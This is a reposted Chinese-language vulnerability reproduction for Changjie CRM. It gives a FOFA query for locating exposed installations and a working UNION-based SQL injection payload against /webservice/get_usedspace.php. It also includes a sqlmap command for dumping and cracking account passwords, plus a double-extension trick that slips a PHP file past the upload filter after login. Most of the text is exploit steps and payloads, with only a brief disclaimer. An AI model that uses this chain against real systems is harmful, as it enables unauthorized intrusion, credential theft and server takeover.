畅捷CRM SQL注入+后台文件上传漏洞

本文转载于公众号:融云攻防实验室,原文地址:

漏洞复现 畅捷CRM SQL注入+后台文件上传漏洞

0x01 阅读须知

资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明

0x02 漏洞描述

畅捷CRM是面向小企业全力打造的简单、实用的客户关系管理应用!畅捷CRM帮助企业用好自己的客户资源、管好商机跟进过程、引导好业务员跟单行为。畅捷CRM系统存在sql注入后台文件上传漏洞,攻击者可以通过上传木马执行任意命令,获取服务器管理权限。

图片[1]-畅捷CRM SQL注入+后台文件上传漏洞-渗透云记 - 专注于网络安全与技术分享

0x03 漏洞复现

fofatitle=”畅捷CRM”

1.SQL注入漏洞点出在执行/webservice/get_usedspace.php?site_id=,执行的POC,得到回显old6old6old6,证明存在漏洞

/webservice/get_usedspace.php?site_id=-1159 UNION ALL SELECT CONCAT(0x6f6c6436,0x6f6c6436,0x6f6c6436)--
图片[2]-畅捷CRM SQL注入+后台文件上传漏洞-渗透云记 - 专注于网络安全与技术分享

2.使用sqlmap进行账号密码发现,通过MD5解密即可得到密码,脚本如下:

python sqlmap.py -u "http://{{Hostname}}/webservice/get_usedspace.php?site_id=1"
图片[3]-畅捷CRM SQL注入+后台文件上传漏洞-渗透云记 - 专注于网络安全与技术分享

3.进入后台→客户→点击客户→新建test客户→附件→新建附件→上传内容为phpinfo文件名为testma.ma.php→点击test的名称


1.格式为xx.xx.php可绕过上传限制
2.内容:
<?php phpinfo();?>
图片[4]-畅捷CRM SQL注入+后台文件上传漏洞-渗透云记 - 专注于网络安全与技术分享

4.点击testma.ma.php,即可解析phpinfo

© 版权声明
THE END
喜欢就支持一下吧
点赞15 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容